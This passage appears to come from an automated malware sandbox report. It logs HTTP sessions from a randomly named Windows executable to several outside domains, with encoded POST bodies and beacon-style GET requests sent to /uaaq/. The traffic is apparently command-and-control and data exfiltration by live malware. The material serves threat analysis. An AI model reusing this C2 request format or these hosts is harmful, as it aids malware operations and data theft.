                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                                    Dec 4, 2023 12:08:28.347094059 CET244INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                                    Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    57192.168.11.304981766.96.162.142803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:36.495969057 CET430OUTGET /uaaq/?XFs82=6R5Xx6907&9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA== HTTP/1.1
                                                                                    Host: www.90dayleaderlab.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:08:36.599303961 CET813INHTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:08:36 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Content-Length: 347
                                                                                    Connection: close
                                                                                    Server: Apache/2
                                                                                    Location: https://www.90dayleaderlab.com/uaaq/?XFs82=6R5Xx6907&9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA==
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 04 Dec 2023 12:03:37 GMT
                                                                                    Age: 299
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 39 30 64 61 79 6c 65 61 64 65 72 6c 61 62 2e 63 6f 6d 2f 75 61 61 71 2f 3f 58 46 73 38 32 3d 36 52 35 58 78 36 39 30 37 26 61 6d 70 3b 39 70 47 30 4c 3d 2b 68 77 64 38 69 51 6c 36 57 5a 46 79 45 41 42 41 31 34 66 43 6f 7a 46 4b 76 44 78 67 52 74 47 41 4d 47 41 35 58 70 75 6a 68 6d 66 75 79 44 2b 78 62 4c 75 53 78 72 2f 33 70 31 71 64 39 2f 37 4f 6e 4e 4f 53 37 62 51 66 37 6c 30 43 58 38 37 4d 59 66 71 4b 32 6f 6c 6b 62 6e 34 61 42 4e 76 48 41 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.90dayleaderlab.com/uaaq/?XFs82=6R5Xx6907&amp;9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA==">here</a>.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    58192.168.11.304981864.190.62.22803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:41.794485092 CET728OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.foodpackaging-jobs07.xyz
                                                                                    Referer: http://www.foodpackaging-jobs07.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 54 66 66 36 38 6c 76 51 62 68 39 2f 70 6e 4d 43 5a 73 37 2f 71 59 39 72 63 61 63 59 56 36 75 39 77 65 6b 7a 35 5a 6f 6b 6e 6c 6c 51 77 34 6f 58 4a 37 66 37 76 50 59 49 2f 72 55 74 37 66 51 33 59 6c 44 44 4e 6a 46 54 73 6a 64 75 7a 52 38 37 51 63 72 6c 30 4e 67 49 35 6f 77 41 4c 5a 70 47 6d 37 77 4c 56 64 43 66 37 41 69 30 53 61 35 63 67 42 58 53 51 47 30 52 57 34 32 4f 51 48 73 70 35 67 55 63 31 58 43 44 63 72 37 48 39 42 42 49 36 43 37 61 6a 35 39 6c 4d 58 46 46 34 43 4c 34 4b 68 47 63 4a 30 39 48 58 4d 77 5a 45 45 36 37 32 51 3d 3d
                                                                                    Data Ascii: 9pG0L=Tff68lvQbh9/pnMCZs7/qY9rcacYV6u9wekz5ZoknllQw4oXJ7f7vPYI/rUt7fQ3YlDDNjFTsjduzR87Qcrl0NgI5owALZpGm7wLVdCf7Ai0Sa5cgBXSQG0RW42OQHsp5gUc1XCDcr7H9BBI6C7aj59lMXFF4CL4KhGcJ09HXMwZEE672Q==
                                                                                    Dec 4, 2023 12:08:41.977145910 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:08:41 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    59192.168.11.304981964.190.62.22803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:44.497402906 CET748OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.foodpackaging-jobs07.xyz
                                                                                    Referer: http://www.foodpackaging-jobs07.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 54 66 66 36 38 6c 76 51 62 68 39 2f 37 58 38 43 61 4c 6e 2f 37 6f 39 71 5a 61 63 59 62 71 75 35 77 66 59 7a 35 62 45 4b 6e 32 42 51 77 61 41 58 62 4b 66 37 73 50 59 49 30 4c 56 6e 31 2f 52 37 59 6c 47 30 4e 69 35 54 73 6a 4a 75 7a 51 4d 37 52 74 72 6d 31 64 67 57 79 49 77 47 46 35 70 47 6d 37 77 4c 56 64 2f 34 37 42 47 30 54 72 4a 63 69 6c 4c 52 59 6d 30 53 56 34 32 4f 43 33 73 74 35 67 55 36 31 53 69 35 63 74 2f 48 39 41 52 49 36 7a 37 56 71 35 39 6e 43 33 45 51 78 68 79 52 50 51 36 63 4f 6c 70 6c 4a 70 4a 79 42 52 57 6f 78 6f 33 62 63 37 74 51 55 52 65 31 34 2f 30 48 6d 52 70 59 66 69 67 3d
                                                                                    Data Ascii: 9pG0L=Tff68lvQbh9/7X8CaLn/7o9qZacYbqu5wfYz5bEKn2BQwaAXbKf7sPYI0LVn1/R7YlG0Ni5TsjJuzQM7Rtrm1dgWyIwGF5pGm7wLVd/47BG0TrJcilLRYm0SV42OC3st5gU61Si5ct/H9ARI6z7Vq59nC3EQxhyRPQ6cOlplJpJyBRWoxo3bc7tQURe14/0HmRpYfig=
                                                                                    Dec 4, 2023 12:08:44.680454016 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:08:44 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    60192.168.11.304982064.190.62.22803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:47.199816942 CET1665OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.foodpackaging-jobs07.xyz
                                                                                    Referer: http://www.foodpackaging-jobs07.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 54 66 66 36 38 6c 76 51 62 68 39 2f 37 58 38 43 61 4c 6e 2f 37 6f 39 71 5a 61 63 59 62 71 75 35 77 66 59 7a 35 62 45 4b 6e 32 4a 51 77 72 67 58 4b 64 6a 37 74 50 59 49 35 72 56 6d 31 2f 52 32 59 6c 2b 34 4e 69 30 78 73 6e 35 75 70 79 45 37 41 70 48 6d 38 64 67 57 39 6f 77 44 4c 5a 70 58 6d 37 67 50 56 64 50 34 37 42 47 30 54 6f 52 63 6c 78 58 52 65 6d 30 52 57 34 32 4b 51 48 73 4a 35 68 38 45 31 53 76 62 63 39 66 48 38 68 68 49 34 68 54 56 6f 5a 39 66 42 33 46 54 78 67 4f 4b 50 51 32 71 4f 6c 4e 66 4a 75 6c 79 43 77 33 7a 69 4d 69 4d 4a 64 35 4c 53 31 61 49 37 61 6b 2f 79 52 5a 64 41 43 61 30 47 31 31 46 49 51 48 49 6a 31 42 76 79 36 44 43 42 32 6b 4b 6f 63 69 6b 4a 66 71 36 53 35 73 5a 6e 66 64 61 6e 6c 50 67 47 52 4e 54 34 7a 45 46 50 57 56 67 54 52 6d 37 75 2f 54 4c 50 4c 79 35 46 4a 70 39 53 66 72 64 54 51 66 4e 65 4b 31 4d 6a 6c 61 59 4e 76 44 74 64 34 41 57 73 65 51 6e 67 58 62 54 6d 6c 33 58 4f 4f 63 71 43 76 62 50 31 53 62 51 62 6b 72 77 72 70 56 31 74 65 43 65 6e 33 36 5a 65 6b 4e 56 7a 74 5a 79 50 4d 32 6c 39 7a 7a 42 41 53 69 58 4f 41 61 57 42 6e 4a 37 41 78 5a 57 51 57 34 4d 30 72 71 49 42 56 34 58 33 44 53 7a 6d 4c 39 63 6f 74 52 41 55 44 68 76 36 7a 57 72 33 45 36 43 56 54 59 4a 4b 76 64 78 55 4d 54 6f 51 34 50 51 39 52 6d 68 75 59 45 7a 6d 51 30 63 67 6b 46 33 2b 64 7a 63 64 47 5a 67 6c 49 69 32 30 77 45 41 44 6a 73 51 64 4a 2b 4e 59 75 47 4d 72 32 32 73 49 36 69 50 47 41 6d 68 69 78 42 65 6a 77 41 49 47 31 4d 6e 33 43 75 6b 74 42 41 39 64 5a 4a 46 66 44 32 38 6c 38 34 2b 74 55 57 75 72 35 35 78 35 49 64 6a 71 77 4e 7a 42 4e 77 37 6a 38 53 65 75 6d 77 52 56 4c 68 73 76 57 32 2f 77 47 33 4c 51 64 59 55 49 37 72 66 72 55 6a 75 65 43 76 6d 4a 6e 56 79 38 33 57 54 69 73 72 43 4d 50 6c 59 6d 31 62 44 44 4c 77 2f 2b 55 6d 52 7a 63 4f 44 64 4e 58 6a 62 72 30 5a 54 42 75 31 51 2f 47 4a 74 6d 35 45 4d 37 34 6c 56 52 5a 57 56 31 59 4d 63 71 61 68 32 48 33 48 37 30 44 56 42 43 52 34 35 6b 61 5a 6b 53 6b 6f 68 47 6a 74 6c 39 48 6a 4d 79 41 36 44 63 55 4a 52 75 72 79 79 6a 78 54 55 53 61 31 73 47 44 57 45 5a 42 65 41 4a 55 54 55 31 52 4a 42 36 68 2b 59 74 34 4d 45 4c 42 54 6c 53 4e 66 31 62 53 68 6e 37 58 74 52 30 52 47 71 38 6a 66 4e 76 76 52 63 52 47 4d 61 6e 35 48 70 4a 70 6a 50 4f 76 65 42 56 57 64 59 4a 61 67 30 59 41 70 46 41 55 2b 66 63 31 47 55 56 4c 4a 7a 41 4d 4a 52 2f 72 74 64 72 48 58 67 53 49 6b 64 68 79 38 6c 2f 4c 6f 64 64 6f 71 54 57 30 71 46 58 66 32 33 38 4b 70 49 74 4e 39 54 39 72 7a 48 51 4d 66 56 35 42 33 61 76 79 49 38 42 49 39 64 77 6e 48 59 37 51 4f 79 56 2b 6e 42 4f 57 41 53 67 42 76 43 75 6c 6e 7a 42 64 4c 73 34 43 50 39 4b 4b 74 49 4b 6f 30 74 30 2f 73 4b 47 70 2f 58 69 64 53 49 65 52 4d 46 45 4f 44 69 39 57 72 7a 46 43 63 4e 73 51 6f 6c 61 73 56 35 4e 39 49 6c 6f 34 39 52 66 4c 65 30 2b 57 4c 36 79 6c 68 37 46 77 65 51 35 45 65 46 44 56 2f 36 54 55 79 46 31 76 49 54 67 4b 50 68 4a 63 37 6b 32 33 32 2b 5a 6d 31 42 34 41 2f 38 51 2b 30 73 2b 41 31 67 6a 53 2b 4f 39 51 76 31 4b 70 62 6d 33 36 35 44 4e 49 6e 75 4c 38 4e 70 4c 30 74 78 30 66 47 61 33 35 73 71 75 6c 54 70 66 65 6b 47 58 66 4f 69 62 43 57 6d 75 47 6a 67 71 38 4c 56 30 71 6c 6c 51 55 7a 57 70 59 42 67 72 70 4a 4e 39 57 31 4e 47 47 59 68 42 38 30 38 4a 2f 74 64 37 2f 4a 58 32 39 4d 68 44 70 43 4c 6f 53 69 58 62 47 6b 67 72 36 47 5a 62 48 38 78 55 58 71 43 37 49 6f 71 52 78 6b 72 64 37 64 4e 47 4a 47
                                                                                    Data Ascii: 9pG0L=Tff68lvQbh9/7X8CaLn/7o9qZacYbqu5wfYz5bEKn2JQwrgXKdj7tPYI5rVm1/R2Yl+4Ni0xsn5upyE7ApHm8dgW9owDLZpXm7gPVdP47BG0ToRclxXRem0RW42KQHsJ5h8E1Svbc9fH8hhI4hTVoZ9fB3FTxgOKPQ2qOlNfJulyCw3ziMiMJd5LS1aI7ak/yRZdACa0G11FIQHIj1Bvy6DCB2kKocikJfq6S5sZnfdanlPgGRNT4zEFPWVgTRm7u/TLPLy5FJp9SfrdTQfNeK1MjlaYNvDtd4AWseQngXbTml3XOOcqCvbP1SbQbkrwrpV1teCen36ZekNVztZyPM2l9zzBASiXOAaWBnJ7AxZWQW4M0rqIBV4X3DSzmL9cotRAUDhv6zWr3E6CVTYJKvdxUMToQ4PQ9RmhuYEzmQ0cgkF3+dzcdGZglIi20wEADjsQdJ+NYuGMr22sI6iPGAmhixBejwAIG1Mn3CuktBA9dZJFfD28l84+tUWur55x5IdjqwNzBNw7j8SeumwRVLhsvW2/wG3LQdYUI7rfrUjueCvmJnVy83WTisrCMPlYm1bDDLw/+UmRzcODdNXjbr0ZTBu1Q/GJtm5EM74lVRZWV1YMcqah2H3H70DVBCR45kaZkSkohGjtl9HjMyA6DcUJRuryyjxTUSa1sGDWEZBeAJUTU1RJB6h+Yt4MELBTlSNf1bShn7XtR0RGq8jfNvvRcRGMan5HpJpjPOveBVWdYJag0YApFAU+fc1GUVLJzAMJR/rtdrHXgSIkdhy8l/LoddoqTW0qFXf238KpItN9T9rzHQMfV5B3avyI8BI9dwnHY7QOyV+nBOWASgBvCulnzBdLs4CP9KKtIKo0t0/sKGp/XidSIeRMFEODi9WrzFCcNsQolasV5N9Ilo49RfLe0+WL6ylh7FweQ5EeFDV/6TUyF1vITgKPhJc7k232+Zm1B4A/8Q+0s+A1gjS+O9Qv1Kpbm365DNInuL8NpL0tx0fGa35squlTpfekGXfOibCWmuGjgq8LV0qllQUzWpYBgrpJN9W1NGGYhB808J/td7/JX29MhDpCLoSiXbGkgr6GZbH8xUXqC7IoqRxkrd7dNGJG
                                                                                    Dec 4, 2023 12:08:47.382878065 CET755INHTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:08:47 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    61192.168.11.304982164.190.62.22803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:49.902487040 CET436OUTGET /uaaq/?9pG0L=ed3a/Sv+YSNt0BMMWtDh8oRuTPUbBqji39M76aoz6xorlqt/FJu/vPF07bZH/KR6fDXWAwgG8DEezwMWX4bfyuM0xYlQJ9cJ0w==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:08:50.085201025 CET161INHTTP/1.1 436
                                                                                    date: Mon, 04 Dec 2023 11:08:49 GMT
                                                                                    content-length: 0
                                                                                    server: NginX
                                                                                    connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    62192.168.11.304982237.97.254.27803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:08:55.266527891 CET686OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.rocsys.net
